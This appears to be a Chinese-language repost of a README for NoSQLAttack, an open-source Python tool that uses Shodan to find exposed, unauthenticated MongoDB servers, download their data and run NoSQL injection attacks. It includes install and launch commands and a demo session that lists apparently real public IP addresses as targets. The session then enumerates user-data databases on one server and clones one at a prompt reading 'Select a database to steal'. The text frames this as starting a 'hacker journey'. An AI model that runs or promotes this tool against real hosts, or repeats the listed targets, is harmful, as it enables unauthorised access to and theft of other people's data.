項目地址:https://github.com/youngyangyang04/NoSQLAttack
項目作者:youngyangyang04
介紹
NoSQLAttack 是一個用python編寫的開源的攻擊工具,用來暴露網絡中默認配置mongoDB的IP并且下載目標mongoDB的數據,同時還可以針對以mongoDB為后臺存儲的應用進行注入攻擊,使用這個工具就可以發現有成千上萬的mongoDB裸奔在互聯網上,并且數據可以隨意下載。
這個攻擊工具是基于tcstool的NoSQLMap和搜索引擎shodan
一些攻擊的數據是來自于以下論文給予的啟發
- Diglossia: Detecting Code Injection Attacks with Precision and Efficiency
- No SQL, No Injection?
- Several thousand MongoDBs without access control on the Internet.
NoSQL注入攻擊測試系統NoSQLInjectionAttackDemo,這里面有兩個系統用來測試注入攻擊。
背景介紹
在NoSQL注入攻擊中有PHP數組注入,js注入和mongo shell拼接注入等多種方法可以攻擊mongoDB,并且現在有成千上萬的mongoDB暴露在互聯網上,只要知道目標mongoDB的ip和端口號就可以把裸露的mongoDB中的數據都下載下來。
運行環境
項目運行在linux系統上,NoSQLAttack的依賴包已經寫在setup.py文件里,并且已經在Ubuntu 和MAC OS X上都測試了,只需要執行這個腳本就可以自動配置好安裝環境 開發這個項目使用時使用的是Pycharm COMMUNITY 2016.1,python的版本為2.7.10,使用者需要在本地電腦安裝mongoDB。
安裝
在linux系統下可以直接將下載的項目解壓,然后執行以下兩個命令
cd NoSQLAttack
python setup.py install
使用方法
安裝完畢后,執行一下命令就可以啟動該項目
NoSQLAttack
啟動該項目后將會展現如下的界面,然后就可以開啟黑客之旅了
================================================
NoSQL Attack
================================================
NoSQLAttack-v0.2
sunxiuyang04@gmail.com
1-Scan attacked IP
2-Configurate parameters
3-MongoDB Access Attacks
4-Injection Attacks
x-Exit
系統演示
===============================================
NoSQL Attack
================================================
NoSQLAttack-v0.2
sunxiuyang04@gmail.com
1-Scan attacked IP
2-Configurate parameters
3-MongoDB Access Attacks
4-Injection Attacks
x-Exit
Select an option:1
Start Scanning.....
Results found:28793
1_Attacked IP : 149.202.88.135
2_Attacked IP : 49.212.186.80
3_Attacked IP : 85.9.62.231
4_Attacked IP : 121.78.239.11
5_Attacked IP : 54.226.207.112
6_Attacked IP : 119.254.66.44
7_Attacked IP : 121.46.0.83
8_Attacked IP : 162.243.21.180
9_Attacked IP : 210.23.29.75
Select IP to attack:2
Start Default Configuration Attack(y/n)?y
DB access attacks(mongoDB)
=========================
Checking to see if crendentials are need
49.212.186.80
27017
Successful access with no credentials!
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Clone a Database
4-Return to Main Menu
Select an attack: 2
List of databases:
MultiCopyService_UserData
SmartNFC_UserData
SmartShop_UserData
KioskPointMng2_UserData
admin
db
local
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Clone a Database
4-Return to Main Menu
Select an attack: 3
(1)MultiCopyService_UserData
(2)SmartNFC_UserData
(3)SmartShop_UserData
(4)KioskPointMng2_UserData
(5)admin
(6)db
(7)dbItem
(8)local
Select a database to steal:6
Does this Database require credentials.(y/n)?n
Database cloned. Copy another (y/n)?
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.jmbmsq.com/110/
暫無評論